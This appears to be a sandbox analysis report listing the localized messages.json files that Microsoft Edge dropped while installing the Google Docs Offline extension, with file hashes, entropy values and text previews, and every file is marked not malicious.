Preview:	{.. "createnew": {.. "message": "SKEP NUWE".. },.. "explanationofflinedisabled": {.. "message": "Jy is vanlyn. As jy Google Dokumente sonder 'n internetverbinding wil gebruik, moet jy die volgende keer as jy aan die internet gekoppel is na instellings op die Google Dokumente-tuisblad gaan en vanlynsinkronisering aanskakel.".. },.. "explanationofflineenabled": {.. "message": "Jy is vanlyn, maar jy kan nog steeds beskikbare l.ers redigeer of nuwes skep.".. },.. "extdesc": {.. "message": "Skep, wysig en bekyk jou dokumente, sigblaaie en aanbiedings . alles sonder toegang tot die internet.".. },.. "extname": {.. "message": "Google Vanlyn Dokumente".. },.. "learnmore": {.. "message": "Kom meer te wete".. },.. "popuphelptext": {.. "message": "Skryf, redigeer en werk saam, waar jy ook al is, met of sonder 'n internetverbinding.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\am\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1285
Entropy (8bit):	4.702209356847184
Encrypted:	false
SSDEEP:	24:1HAn6bfEpxtmqMI91ivWjm/6GcCIoToCZzlgkX/Mj:W6bMt3MITFjm/Pcd4oCZhg6k
MD5:	9721EBCE89EC51EB2BAEB4159E2E4D8C
SHA1:	58979859B28513608626B563138097DC19236F1F
SHA-256:	3D0361A85ADFCD35D0DE74135723A75B646965E775188F7DCDD35E3E42DB788E
SHA-512:	FA3689E8663565D3C1C923C81A620B006EA69C99FB1EB15D07F8F45192ED9175A6A92315FA424159C1163382A3707B25B5FC23E590300C62CBE2DACE79D84871
Malicious:	false
Preview:	{.. "createnew": {.. "message": "... ...".. },.. "explanationofflinedisabled": {.. "message": "..... .. .... Google ..... ........ ..... ..... .Google .... ... .. .. .. ..... .... ....... .. ....... ... .. .. ..... .. ..... ....".. },.. "explanationofflineenabled": {.. "message": "..... .. .... ... .. .... .... ..... .... ... ..... .... .....".. },.. "extdesc": {.. "message": "...... ..... .... ... .. ..... ...... ..... .... .. ..... . .... .. ...... .....".. },.. "extname": {.. "message": "..... .. Goog

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ar\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1244
Entropy (8bit):	4.5533961615623735
Encrypted:	false
SSDEEP:	12:1HASvgPCBxNhieFTr9ogjIxurIyJCCBxeh6wAZKn7uCSUhStuysUm+WCBhSueW1Y:1HAgJzoaC6VEn7Css8yoXzzd
MD5:	3EC93EA8F8422FDA079F8E5B3F386A73
SHA1:	24640131CCFB21D9BC3373C0661DA02D50350C15
SHA-256:	ABD0919121956AB535E6A235DE67764F46CFC944071FCF2302148F5FB0E8C65A
SHA-512:	F40E879F85BC9B8120A9B7357ED44C22C075BF065F45BEA42BD5316AF929CBD035D5D6C35734E454AEF5B79D378E51A77A71FA23F9EBD0B3754159718FCEB95C
Malicious:	false
Preview:	{.. "createnew": {.. "message": "..... ....".. },.. "explanationofflinedisabled": {.. "message": "... ... ...... ........ ....... Google ... ..... .......... ..... ... ......... .. ...... ........ ........ Google ..... ........ ... ..... .. ..... ....... .... .... .... ..........".. },.. "explanationofflineenabled": {.. "message": "... ... ...... .... .. .... ....... ..... ....... ....... .. ..... ..... ......".. },.. "extdesc": {.. "message": "..... ......... ...... ........ ....... ......... ........ ....... .. ... ... ..... .........".. },.. "extname": {.. "message": "....... Google ... ......".. },.. "learnmore": {.. "messa

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\az\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	977
Entropy (8bit):	4.867640976960053
Encrypted:	false
SSDEEP:	24:1HAWNjbwlmyuAoW32Md+80cVLdUSERHtRo3SjX:J3wlzs42m+8TV+S4H0CjX
MD5:	9A798FD298008074E59ECC253E2F2933
SHA1:	1E93DA985E880F3D3350FC94F5CCC498EFC8C813
SHA-256:	628145F4281FA825D75F1E332998904466ABD050E8B0DC8BB9B6A20488D78A66
SHA-512:	9094480379F5AB711B3C32C55FD162290CB0031644EA09A145E2EF315DA12F2E55369D824AF218C3A7C37DD9A276AEEC127D8B3627D3AB45A14B0191ED2BBE70
Malicious:	false
Preview:	{.. "createnew": {.. "message": "YEN.S.N. YARADIN".. },.. "explanationofflinedisabled": {.. "message": "Oflayns.n.z. Google S.n.di internet ba.lant.s. olmadan istifad. etm.k ist.yirsinizs., Google S.n.din .sas s.hif.sind. ayarlara gedin v. n.vb.ti d.f. internet. qo.ulanda oflayn sinxronizasiyan. aktiv edin.".. },.. "explanationofflineenabled": {.. "message": "Oflayns.n.z, amma m.vcud fayllar. redakt. ed. v. yenil.rini yarada bil.rsiniz.".. },.. "extdesc": {.. "message": "S.n.d, c.dv.l v. t.qdimatlar.n ham.s.n. internet olmadan redakt. edin, yarad.n v. bax.n.".. },.. "extname": {.. "message": "Google S.n.d Oflayn".. },.. "learnmore": {.. "message": ".trafl. M.lumat".. },.. "popuphelptext": {.. "message": "Harda olma..n.zdan v. internet. qo.ulu olub-olmad...n.zdan as.l. olmayaraq, yaz.n, redakt. edin v. .m.kda.l.q edin.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\be\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	3107
Entropy (8bit):	3.535189746470889
Encrypted:	false
SSDEEP:	48:YOWdTQ0QRk+QyJQAy6Qg4QWSe+QECTQLHQlQIfyQ0fnWQjQDrTQik+QvkZTQ+89b:GdTbyRvwgbCTEHQhyVues9oOT3rOCkV
MD5:	68884DFDA320B85F9FC5244C2DD00568
SHA1:	FD9C01E03320560CBBB91DC3D1917C96D792A549
SHA-256:	DDF16859A15F3EB3334D6241975CA3988AC3EAFC3D96452AC3A4AFD3644C8550
SHA-512:	7FF0FBD555B1F9A9A4E36B745CBFCAD47B33024664F0D99E8C080BE541420D1955D35D04B5E973C07725573E592CD0DD84FDBB867C63482BAFF6929ADA27CCDE
Malicious:	false
Preview:	{"createnew":{"message":"\u0421\u0422\u0412\u0410\u0420\u042b\u0426\u042c \u041d\u041e\u0412\u042b"},"explanationofflinedisabled":{"message":"\u0412\u044b \u045e \u043f\u0430\u0437\u0430\u0441\u0435\u0442\u043a\u0430\u0432\u044b\u043c \u0440\u044d\u0436\u044b\u043c\u0435. \u041a\u0430\u0431 \u043a\u0430\u0440\u044b\u0441\u0442\u0430\u0446\u0446\u0430 \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u043c\u0456 Google \u0431\u0435\u0437 \u043f\u0430\u0434\u043a\u043b\u044e\u0447\u044d\u043d\u043d\u044f \u0434\u0430 \u0456\u043d\u0442\u044d\u0440\u043d\u044d\u0442\u0443, \u043f\u0435\u0440\u0430\u0439\u0434\u0437\u0456\u0446\u0435 \u0434\u0430 \u043d\u0430\u043b\u0430\u0434 \u043d\u0430 \u0433\u0430\u043b\u043e\u045e\u043d\u0430\u0439 \u0441\u0442\u0430\u0440\u043e\u043d\u0446\u044b \u0414\u0430\u043a\u0443\u043c\u0435\u043d\u0442\u0430\u045e Google \u0456 \u045e\u043a\u043b\u044e\u0447\u044b\u0446\u0435 \u0441\u0456\u043d\u0445\u0440\u0430\u043d\u0456\u0437\u0430\u0446\u044b\u044e

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\bg\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1389
Entropy (8bit):	4.561317517930672
Encrypted:	false
SSDEEP:	24:1HAp1DQqUfZ+Yann08VOeadclUZbyMzZzsYvwUNn7nOyRK8/nn08V7:g1UTfZ+Ya08Uey3tflCRE08h
MD5:	2E6423F38E148AC5A5A041B1D5989CC0
SHA1:	88966FFE39510C06CD9F710DFAC8545672FFDCEB
SHA-256:	AC4A8B5B7C0B0DD1C07910F30DCFBDF1BCB701CFCFD182B6153FD3911D566C0E
SHA-512:	891FCDC6F07337970518322C69C6026896DD3588F41F1E6C8A1D91204412CAE01808F87F9F2DEA1754458D70F51C3CEF5F12A9E3FC011165A42B0844C75EC683
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".........".. },.. "explanationofflinedisabled": {.. "message": "...... .... .. .. .......... Google ......... ... ........ ......, ........ ........... . ......... ........ .. Google ......... . ........ ...... .............. ......... ..., ...... ..... ...... . .........".. },.. "explanationofflineenabled": {.. "message": "...... ..., .. ... ...... .. ........... ......... ....... ... .. ......... .....".. },.. "extdesc": {.. "message": "............, .......... . ............ ...... ........., .......... ....... . ........... . ...... .... ... ...... .. .........".. },..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\bn\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1763
Entropy (8bit):	4.25392954144533
Encrypted:	false
SSDEEP:	24:1HABGtNOtIyHmVd+q+3X2AFl2DhrR7FAWS9+SMzI8QVAEq8yB0XtfOyvU7D:oshmm/+H2Ml2DrFPS9+S99EzBd7D
MD5:	651375C6AF22E2BCD228347A45E3C2C9
SHA1:	109AC3A912326171D77869854D7300385F6E628C
SHA-256:	1DBF38E425C5C7FC39E8077A837DF0443692463BA1FBE94E288AB5A93242C46E
SHA-512:	958AA7CF645FAB991F2ECA0937BA734861B373FB1C8BCC001599BE57C65E0917F7833A971D93A7A6423C5F54A4839D3A4D5F100C26EFA0D2A068516953989F9D
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".... .... ....".. },.. "explanationofflinedisabled": {.. "message": ".... ....... ....... .... ......... ..... ..... Google ........ ....... ...., Google .......... ........ ....... ... ... .... ... .... ... ........... .... ....... .... ... ...... ..... .... .....".. },.. "explanationofflineenabled": {.. "message": ".... ....... ......, ...... .... .... ...... .......... ........ .... .. .... .... .... .... .......".. },.. "extdesc":

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\ca\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	930
Entropy (8bit):	4.569672473374877
Encrypted:	false
SSDEEP:	12:1HASvggoSCBxNFT0sXuqgEHQ2fTq9blUJYUJaw9CBxejZFPLOjCSUuE44pMiiDat:1HAtqs+BEHGpURxSp1iUPWCAXtRKe
MD5:	D177261FFE5F8AB4B3796D26835F8331
SHA1:	4BE708E2FFE0F018AC183003B74353AD646C1657
SHA-256:	D6E65238187A430FF29D4C10CF1C46B3F0FA4B91A5900A17C5DFD16E67FFC9BD
SHA-512:	E7D730304AED78C0F4A78DADBF835A22B3D8114FB41D67B2B26F4FE938B572763D3E127B7C1C81EBE7D538DA976A7A1E7ADC40F918F88AFADEA2201AE8AB47D0
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREA'N UN DE NOU".. },.. "explanationofflinedisabled": {.. "message": "No tens connexi.. Per utilitzar Documents de Google sense connexi. a Internet, ves a la configuraci. de la p.gina d'inici d'aquest servei i activa l'opci. per sincronitzar-se sense connexi. la propera vegada que estiguis connectat a la xarxa.".. },.. "explanationofflineenabled": {.. "message": "Tot i que no tens connexi., pots editar o crear fitxers.".. },.. "extdesc": {.. "message": "Edita, crea i consulta documents, fulls de c.lcul i presentacions, tot sense acc.s a Internet.".. },.. "extname": {.. "message": "Documents de Google sense connexi.".. },.. "learnmore": {.. "message": "M.s informaci.".. },.. "popuphelptext": {.. "message": "Escriu text, edita fitxers i col.labora-hi siguis on siguis, amb o sense connexi. a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\cs\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	913
Entropy (8bit):	4.947221919047
Encrypted:	false
SSDEEP:	12:1HASvgdsbCBxNBmobXP15Dxoo60n40h6qCBxeBeGG/9jZCSUKFPDLZ2B2hCBhPLm:1HApJmoZ5e50nzQhwAd7dvYB2kDSGGKs
MD5:	CCB00C63E4814F7C46B06E4A142F2DE9
SHA1:	860936B2A500CE09498B07A457E0CCA6B69C5C23
SHA-256:	21AE66CE537095408D21670585AD12599B0F575FF2CB3EE34E3A48F8CC71CFAB
SHA-512:	35839DAC6C985A6CA11C1BFF5B8B5E59DB501FCB91298E2C41CB0816B6101BF322445B249EAEA0CEF38F76D73A4E198F2B6E25EEA8D8A94EA6007D386D4F1055
Malicious:	false
Preview:	{.. "createnew": {.. "message": "VYTVO.IT".. },.. "explanationofflinedisabled": {.. "message": "Jste offline. Pokud chcete Dokumenty Google pou..vat bez p.ipojen. k.internetu, a. budete p...t. online, p.ejd.te do nastaven. na domovsk. str.nce Dokument. Google a.zapn.te offline synchronizaci.".. },.. "explanationofflineenabled": {.. "message": "Jste offline, ale st.le m..ete upravovat dostupn. soubory nebo vytv..et nov..".. },.. "extdesc": {.. "message": "Upravujte, vytv..ejte a.zobrazujte sv. dokumenty, tabulky a.prezentace . v.e bez p..stupu k.internetu.".. },.. "extname": {.. "message": "Dokumenty Google offline".. },.. "learnmore": {.. "message": "Dal.. informace".. },.. "popuphelptext": {.. "message": "Pi.te, upravujte a.spolupracujte kdekoli, s.p.ipojen.m k.internetu i.bez n.j.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\cy\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	806
Entropy (8bit):	4.815663786215102
Encrypted:	false
SSDEEP:	12:YGo35xMxy6gLr4Dn1eBVa1xzxyn1VFQB6FDVgdAJex9QH7uy+XJEjENK32J21j:Y735+yoeeRG54uDmdXx9Q7u3r83Xj
MD5:	A86407C6F20818972B80B9384ACFBBED
SHA1:	D1531CD0701371E95D2A6BB5EDCB79B949D65E7C
SHA-256:	A482663292A913B02A9CDE4635C7C92270BF3C8726FD274475DC2C490019A7C9
SHA-512:	D9FBF675514A890E9656F83572208830C6D977E34D5744C298A012515BC7EB5A17726ADD0D9078501393BABD65387C4F4D3AC0CC0F7C60C72E09F336DCA88DE7
Malicious:	false
Preview:	{"createnew":{"message":"CREU NEWYDD"},"explanationofflinedisabled":{"message":"Rydych chi all-lein. I ddefnyddio Dogfennau Google heb gysylltiad \u00e2'r rhyngrwyd, ewch i'r gosodiadau ar dudalen hafan Dogfennau Google a throi 'offine sync' ymlaen y tro nesaf y byddwch wedi'ch cysylltu \u00e2'r rhyngrwyd."},"explanationofflineenabled":{"message":"Rydych chi all-lein, ond gallwch barhau i olygu'r ffeiliau sydd ar gael neu greu rhai newydd."},"extdesc":{"message":"Gallwch olygu, creu a gweld eich dogfennau, taenlenni a chyflwyniadau \u2013 i gyd heb fynediad i'r rhyngrwyd."},"extname":{"message":"Dogfennau Google All-lein"},"learnmore":{"message":"DYSGU MWY"},"popuphelptext":{"message":"Ysgrifennwch, golygwch a chydweithiwch lle bynnag yr ydych, gyda chysylltiad \u00e2'r rhyngrwyd neu hebddo."}}.

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\da\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	883
Entropy (8bit):	4.5096240460083905
Encrypted:	false
SSDEEP:	24:1HA4EFkQdUULMnf1yo+9qgpukAXW9bGJTvDyqdr:zEFkegfw9qwAXWNs/yu
MD5:	B922F7FD0E8CCAC31B411FC26542C5BA
SHA1:	2D25E153983E311E44A3A348B7D97AF9AAD21A30
SHA-256:	48847D57C75AF51A44CBF8F7EF1A4496C2007E58ED56D340724FDA1604FF9195
SHA-512:	AD0954DEEB17AF04858DD5EC3D3B3DA12DFF7A666AF4061DEB6FD492992D95DB3BAF751AB6A59BEC7AB22117103A93496E07632C2FC724623BB3ACF2CA6093F3
Malicious:	false
Preview:	{.. "createnew": {.. "message": "OPRET NYT".. },.. "explanationofflinedisabled": {.. "message": "Du er offline. Hvis du vil bruge Google Docs uden en internetforbindelse, kan du g. til indstillinger p. startsiden for Google Docs og aktivere offlinesynkronisering, n.ste gang du har internetforbindelse.".. },.. "explanationofflineenabled": {.. "message": "Du er offline, men du kan stadig redigere tilg.ngelige filer eller oprette nye.".. },.. "extdesc": {.. "message": "Rediger, opret og se dine dokumenter, regneark og pr.sentationer helt uden internetadgang.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "F. flere oplysninger".. },.. "popuphelptext": {.. "message": "Skriv, rediger og samarbejd, uanset hvor du er, og uanset om du har internetforbindelse.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\de\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1031
Entropy (8bit):	4.621865814402898
Encrypted:	false
SSDEEP:	24:1HA6sZnqWd77ykJzCkhRhoe1HMNaAJPwG/p98HKpy2kX/R:WZqWxykJzthRhoQma+tpyHX2O/R
MD5:	D116453277CC860D196887CEC6432FFE
SHA1:	0AE00288FDE696795CC62FD36EABC507AB6F4EA4
SHA-256:	36AC525FA6E28F18572D71D75293970E0E1EAD68F358C20DA4FDC643EEA2C1C5
SHA-512:	C788C3202A27EC220E3232AE25E3C855F3FDB8F124848F46A3D89510C564641A2DFEA86D5014CEA20D3D2D3C1405C96DBEB7CCAD910D65C55A32FDCA8A33FDD4
Malicious:	false
Preview:	{.. "createnew": {.. "message": "NEU ERSTELLEN".. },.. "explanationofflinedisabled": {.. "message": "Sie sind offline. Um Google Docs ohne Internetverbindung zu verwenden, gehen Sie auf der Google Docs-Startseite auf \"Einstellungen\" und schalten die Offlinesynchronisierung ein, wenn Sie das n.chste Mal mit dem Internet verbunden sind.".. },.. "explanationofflineenabled": {.. "message": "Sie sind offline, aber k.nnen weiterhin verf.gbare Dateien bearbeiten oder neue Dateien erstellen.".. },.. "extdesc": {.. "message": "Mit der Erweiterung k.nnen Sie Dokumente, Tabellen und Pr.sentationen bearbeiten, erstellen und aufrufen.. ganz ohne Internetverbindung.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Weitere Informationen".. },.. "popuphelptext": {.. "message": "Mit oder ohne Internetverbindung: Sie k.nnen von .berall Dokumente erstellen, .ndern und zusammen mit anderen

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\el\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1613
Entropy (8bit):	4.618182455684241
Encrypted:	false
SSDEEP:	24:1HAJKan4EITDZGoziRAc2Z8eEfkTJfLhGX7b0UBNoAcGpVyhxefSmuq:SKzTD0IK85JlwsGOUyaSk
MD5:	9ABA4337C670C6349BA38FDDC27C2106
SHA1:	1FC33BE9AB4AD99216629BC89FBB30E7AA42B812
SHA-256:	37CA6AB271D6E7C9B00B846FDB969811C9CE7864A85B5714027050795EA24F00
SHA-512:	8564F93AD8485C06034A89421CE74A4E719BBAC865E33A7ED0B87BAA80B7F7E54B240266F2EDB595DF4E6816144428DB8BE18A4252CBDCC1E37B9ECC9F9D7897
Malicious:	false
Preview:	{.. "createnew": {.. "message": ".......... ....".. },.. "explanationofflinedisabled": {.. "message": "..... ..... ......... ... .. ............... .. ....... Google ..... ....... ... ........., ......... .... ......... .... ...... ...... ... ........ Google ... ............. ... ........... ..... ........ ... ....... .... ... .. ..... ............ ... ..........".. },.. "explanationofflineenabled": {.. "message": "..... ..... ........ .... ........ .. .............. .. ......... ...... . .. ............. ... .......".. },.. "extdesc": {.. "message": ".............., ............ ... ..... .. ......., .

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\en\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\en_CA\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	851
Entropy (8bit):	4.4858053753176526
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3Pj1NzXW6iFryCBxesJGceKCSUuvNn3AwCBhUufz1tHaXRdAv:1HA3dj/BNzXviFrpj4sNQXJezAa6
MD5:	07FFBE5F24CA348723FF8C6C488ABFB8
SHA1:	6DC2851E39B2EE38F88CF5C35A90171DBEA5B690
SHA-256:	6895648577286002F1DC9C3366F558484EB7020D52BBF64A296406E61D09599C
SHA-512:	7ED2C8DB851A84F614D5DAF1D5FE633BD70301FD7FF8A6723430F05F642CEB3B1AD0A40DE65B224661C782FFCEC69D996EBE3E5BB6B2F478181E9A07D8CD41F6
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn More".. },.. "popuphelptext": {.. "message": "Write, edit, and collaborate wherever you are, with or without an internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\en_GB\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	848
Entropy (8bit):	4.494568170878587
Encrypted:	false
SSDEEP:	12:1HASvgg4eCBxNdN3vRyc1NzXW6iFrSCBxesJGceKCSUuvlvOgwCBhUufz1tnaXrQ:1HA3djfR3NzXviFrJj4sJXJ+bA6RM
MD5:	3734D498FB377CF5E4E2508B8131C0FA
SHA1:	AA23E39BFE526B5E3379DE04E00EACBA89C55ADE
SHA-256:	AB5CDA04013DCE0195E80AF714FBF3A67675283768FFD062CF3CF16EDB49F5D4
SHA-512:	56D9C792954214B0DE56558983F7EB7805AC330AF00E944E734340BE41C68E5DD03EDDB17A63BC2AB99BDD9BE1F2E2DA5BE8BA7C43D938A67151082A9041C7BA
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREATE NEW".. },.. "explanationofflinedisabled": {.. "message": "You're offline. To use Google Docs without an Internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the Internet.".. },.. "explanationofflineenabled": {.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extdesc": {.. "message": "Edit, create and view your documents, spreadsheets and presentations . all without Internet access.".. },.. "extname": {.. "message": "Google Docs Offline".. },.. "learnmore": {.. "message": "Learn more".. },.. "popuphelptext": {.. "message": "Write, edit and collaborate wherever you are, with or without an Internet connection.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\en_US\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1425
Entropy (8bit):	4.461560329690825
Encrypted:	false
SSDEEP:	24:1HA6Krbbds5Kna/BNzXviFrpsCxKU4irpNQ0+qWK5yOJAaCB7MAa6:BKrbBs5Kna/BNzXvi3sCxKZirA0jWK5m
MD5:	578215FBB8C12CB7E6CD73FBD16EC994
SHA1:	9471D71FA6D82CE1863B74E24237AD4FD9477187
SHA-256:	102B586B197EA7D6EDFEB874B97F95B05D229EA6A92780EA8544C4FF1E6BC5B1
SHA-512:	E698B1A6A6ED6963182F7D25AC12C6DE06C45D14499DDC91E81BDB35474E7EC9071CFEBD869B7D129CB2CD127BC1442C75E408E21EB8E5E6906A607A3982B212
Malicious:	false
Preview:	{.. "createNew": {.. "description": "Text shown in the extension pop up for creating a new document",.. "message": "CREATE NEW".. },.. "explanationOfflineDisabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is disabled.",.. "message": "You're offline. To use Google Docs without an internet connection, go to settings on the Google Docs homepage and turn on offline sync the next time you're connected to the internet.".. },.. "explanationOfflineEnabled": {.. "description": "Text shown in the extension popup when the user is offline and offline is enabled.",.. "message": "You're offline, but you can still edit available files or create new ones.".. },.. "extDesc": {.. "description": "Extension description",.. "message": "Edit, create, and view your documents, spreadsheets, and presentations . all without internet access.".. },.. "extName": {.. "description": "Extension name",..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\es\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	961
Entropy (8bit):	4.537633413451255
Encrypted:	false
SSDEEP:	12:1HASvggeCBxNFxcw2CVcfamedatqWCCBxeFxCF/m+rWAaFQbCSUuExqIQdO06stp:1HAqn0gcfa9dc/5mCpmIWck02USfWmk
MD5:	F61916A206AC0E971CDCB63B29E580E3
SHA1:	994B8C985DC1E161655D6E553146FB84D0030619
SHA-256:	2008F4FAAB71AB8C76A5D8811AD40102C380B6B929CE0BCE9C378A7CADFC05EB
SHA-512:	D9C63B2F99015355ACA04D74A27FD6B81170750C4B4BE7293390DC81EF4CD920EE9184B05C61DC8979B6C2783528949A4AE7180DBF460A2620DBB0D3FD7A05CF
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a Configuraci.n en la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que te conectes a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n. Aun as., puedes crear archivos o editar los que est.n disponibles.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones; todo ello, sin acceso a Internet.".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe o edita contenido y colabora con otras personas desde cualquier lugar, con o sin conexi.n a Internet.".. }..}..

C:\Users\user\AppData\Local\Temp\scoped_dir7216_841872675\CRX_INSTALL\_locales\es_419\messages.json

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	959
Entropy (8bit):	4.570019855018913
Encrypted:	false
SSDEEP:	24:1HARn05cfa9dcDmQOTtSprj0zaGUSjSGZ:+n0CfMcDmQOTQprj4qpC
MD5:	535331F8FB98894877811B14994FEA9D
SHA1:	42475E6AFB6A8AE41E2FC2B9949189EF9BBE09FB
SHA-256:	90A560FF82605DB7EDA26C90331650FF9E42C0B596CEDB79B23598DEC1B4988F
SHA-512:	2CE9C69E901AB5F766E6CFC1E592E1AF5A07AA78D154CCBB7898519A12E6B42A21C5052A86783ABE3E7A05043D4BD41B28960FEDDB30169FF7F7FE7208C8CFE9
Malicious:	false
Preview:	{.. "createnew": {.. "message": "CREAR NUEVO".. },.. "explanationofflinedisabled": {.. "message": "No tienes conexi.n. Para usar Documentos de Google sin conexi.n a Internet, ve a la configuraci.n de la p.gina principal de Documentos de Google y activa la sincronizaci.n sin conexi.n la pr.xima vez que est.s conectado a Internet.".. },.. "explanationofflineenabled": {.. "message": "No tienes conexi.n, pero a.n puedes modificar los archivos disponibles o crear otros nuevos.".. },.. "extdesc": {.. "message": "Edita, crea y consulta tus documentos, hojas de c.lculo y presentaciones aunque no tengas acceso a Internet".. },.. "extname": {.. "message": "Documentos de Google sin conexi.n".. },.. "learnmore": {.. "message": "M.s informaci.n".. },.. "popuphelptext": {.. "message": "Escribe, modifica y colabora dondequiera que est.s, con conexi.n a Internet o sin ella.".. }..}..

